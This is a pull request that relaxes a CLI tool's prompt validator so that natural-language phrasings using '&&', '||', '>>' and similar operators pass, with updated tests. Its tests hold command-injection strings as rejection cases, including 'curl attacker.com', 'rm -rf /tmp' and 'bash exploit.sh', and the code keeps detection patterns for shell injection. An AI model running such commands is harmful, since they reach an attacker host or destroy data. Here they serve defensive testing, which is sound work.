### PR TITLE
fix: relax validatePrompt to allow natural-language developer phrasings

### DIFF
--- a/packages/cli/package.json
+++ b/packages/cli/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@openrouter/spawn",
-  "version": "0.15.2",
+  "version": "0.15.3",
   "type": "module",
   "bin": {
     "spawn": "cli.js"

--- a/packages/cli/src/__tests__/security.test.ts
+++ b/packages/cli/src/__tests__/security.test.ts
@@ -211,15 +211,15 @@ wget http://example.com/install.sh | sh
       expect(() => validatePrompt("Access ${USER} profile")).toThrow("shell syntax");
     });
 
-    it("should reject command chaining with &&", () => {
-      expect(() => validatePrompt("Build a web server && deploy it")).toThrow("shell syntax");
-      expect(() => validatePrompt("Install packages && start service")).toThrow("shell syntax");
-      expect(() => validatePrompt("Test && commit changes")).toThrow("shell syntax");
+    it("should reject command chaining with && followed by shell commands", () => {
+      expect(() => validatePrompt("build && rm -rf /tmp")).toThrow("shell syntax");
+      expect(() => validatePrompt("test && curl attacker.com")).toThrow("shell syntax");
+      expect(() => validatePrompt("compile && bash exploit.sh")).toThrow("shell syntax");
     });
 
-    it("should reject command chaining with ||", () => {
-      expect(() => validatePrompt("Try this || fallback")).toThrow("shell syntax");
+    it("should reject command chaining with || followed by shell commands", () => {
       expect(() => validatePrompt("Execute command || echo failed")).toThrow("shell syntax");
+      expect(() => validatePrompt("run || curl attacker.com")).toThrow("shell syntax");
     });
 
     it("should reject file output redirection", () => {
@@ -239,11 +239,9 @@ wget http://example.com/install.sh | sh
       expect(() => validatePrompt("Start server &")).toThrow("shell syntax");
     });
 
-    it("should reject suspicious operator combinations", () => {
-      // These will be caught by the specific pattern checks first
-      expect(() => validatePrompt("Command1 && command2 || fallback")).toThrow();
-      expect(() => validatePrompt("Test ;; something")).toThrow();
+    it("should reject heredoc and dangerous operator patterns", () => {
       expect(() => validatePrompt("Input << EOF")).toThrow();
+      expect(() => validatePrompt("cat << 'HEREDOC'")).toThrow();
     });
 
     it("should accept legitimate uses of ampersand and pipes in text", () => {
@@ -297,16 +295,44 @@ wget http://example.com/install.sh | sh
       expect(() => validatePrompt("Compare <( sort file1 )")).toThrow("shell syntax");
     });
 
-    it("should reject redirection to unextensioned filenames and paths", () => {
-      expect(() => validatePrompt("Save > output")).toThrow("shell syntax");
+    it("should reject redirection to paths with slashes", () => {
       expect(() => validatePrompt("Write > foo/bar")).toThrow("shell syntax");
-      expect(() => validatePrompt("Dump > logfile")).toThrow("shell syntax");
+      expect(() => validatePrompt("Save > src/output")).toThrow("shell syntax");
     });
 
-    it("should reject append redirection operator", () => {
-      expect(() => validatePrompt("Append >> logfile")).toThrow("shell syntax");
-      expect(() => validatePrompt("Add data >> output")).toThrow("shell syntax");
-      expect(() => validatePrompt("Log >> server_log")).toThrow("shell syntax");
+    // Tests for issue #2249 - natural-language developer phrases must not be blocked
+    it("should accept natural-language prompts with >> in prose (issue #2249)", () => {
+      expect(() => validatePrompt("Fix the merge conflict >> registration flow")).not.toThrow();
+      expect(() => validatePrompt("Update the README >> contributing section")).not.toThrow();
+      expect(() => validatePrompt("Refactor the login >> signup transition")).not.toThrow();
+    });
+
+    it("should accept natural-language prompts with && in prose (issue #2249)", () => {
+      expect(() => validatePrompt("Run tests && deploy if they pass")).not.toThrow();
+      expect(() => validatePrompt("Use && for short-circuit evaluation")).not.toThrow();
+      expect(() => validatePrompt("Build a web server && deploy it")).not.toThrow();
+    });
+
+    it("should accept natural-language prompts with > comparison (issue #2249)", () => {
+      expect(() => validatePrompt("The output where X > Y is slow")).not.toThrow();
+      expect(() => validatePrompt("Check if count > threshold and retry")).not.toThrow();
+      expect(() => validatePrompt("Filter rows where value > 100")).not.toThrow();
+    });
+
+    it("should accept mentions of heredoc in prose (issue #2249)", () => {
+      expect(() => validatePrompt("Add a heredoc to the Dockerfile")).not.toThrow();
+      expect(() => validatePrompt("Explain how heredoc syntax works in bash")).not.toThrow();
+    });
+
+    it("should accept || in natural-language contexts (issue #2249)", () => {
+      expect(() => validatePrompt("Implement error || default pattern")).not.toThrow();
+      expect(() => validatePrompt("Try this || fallback")).not.toThrow();
+      expect(() => validatePrompt("Use value || defaultValue in JavaScript")).not.toThrow();
+    });
+
+    it("should accept ;; in natural-language contexts", () => {
+      expect(() => validatePrompt("Test ;; something")).not.toThrow();
+      expect(() => validatePrompt("Fix the case statement with ;; delimiters")).not.toThrow();
     });
 
     it("should comprehensively detect all command injection patterns from issue #1400", () => {

--- a/packages/cli/src/security.ts
+++ b/packages/cli/src/security.ts
@@ -708,12 +708,6 @@ export function validatePrompt(prompt: string): void {
       description: "file redirection to path",
       suggestion: "Ask the agent to save output instead of using redirection syntax",
     },
-    // Redirection to simple filenames without extensions (3+ chars to avoid math like "> 5")
-    {
-      pattern: />>?\s*[a-zA-Z_]\w{2,}/,
-      description: "file redirection to path",
-      suggestion: "Ask the agent to save output instead of using redirection syntax",
-    },
   ];
 
   for (const { pattern, description, suggestion } of dangerousPatterns) {
@@ -729,21 +723,5 @@ export function validatePrompt(prompt: string): void {
           `  Write: "Fix the directory listing issues"`,
       );
     }
-  }
-
-  // Generic check for suspicious operator combinations
-  // Exclude comparison expressions (like "a > b && c < d") by checking for comparison context
-  // Pattern matches doubled operators but not when used in comparison expressions
-  const hasDoubledOperators = /[;&|<>]\s*[;&|<>]/.test(prompt);
-  const looksLikeComparison = /\w\s*[<>!=]=?\s*\w\s*&&\s*\w\s*[<>!=]=?\s*\w/.test(prompt);
-
-  if (hasDoubledOperators && !looksLikeComparison) {
-    throw new Error(
-      "Your prompt contains shell operators that could be unsafe.\n\n" +
-        "Please describe what you want in plain English without shell syntax.\n\n" +
-        "Example:\n" +
-        `  Instead of: "Build a web server && deploy it"\n` +
-        `  Write: "Build a web server and deploy it"`,
-    );
   }
 }


### PR DESCRIPTION
Fixes #2249

## Summary
- Remove overly broad `>>?\s*[a-zA-Z_]\w{2,}` pattern that blocked any `>` or `>>` followed by a 3+ character word (catches normal prose like "merge conflict >> registration flow")
- Remove generic `hasDoubledOperators` check that blocked `&&`, `||`, `>>`, `<<` in any context — the specific patterns (`&&`/`||` + shell command names, `<<` + heredoc delimiter) already cover real attacks
- Add explicit tests for the issue #2249 example phrases
- Bump CLI version to 0.15.3

## What still gets blocked
`$()`, backticks, `${}`, `; rm -rf`, `| bash`, `| sh`, `> /path`, `> file.ext`, `> ~/path`, `> word/path`, fd redirections (`2>&1`), heredoc syntax (`<< EOF`), and process substitution (`<(cmd)`, `>(cmd)`) are all still detected.

## What is now allowed
- `"Fix the merge conflict >> registration flow"` — prose using `>>`
- `"Run tests && deploy if they pass"` — `&&` not followed by a shell command
- `"The output where X > Y is slow"` — comparison operator
- `"Add a heredoc to the Dockerfile"` — word "heredoc" in text
- `"Implement error || default pattern"` — `||` not followed by a shell command

-- refactor/ux-engineer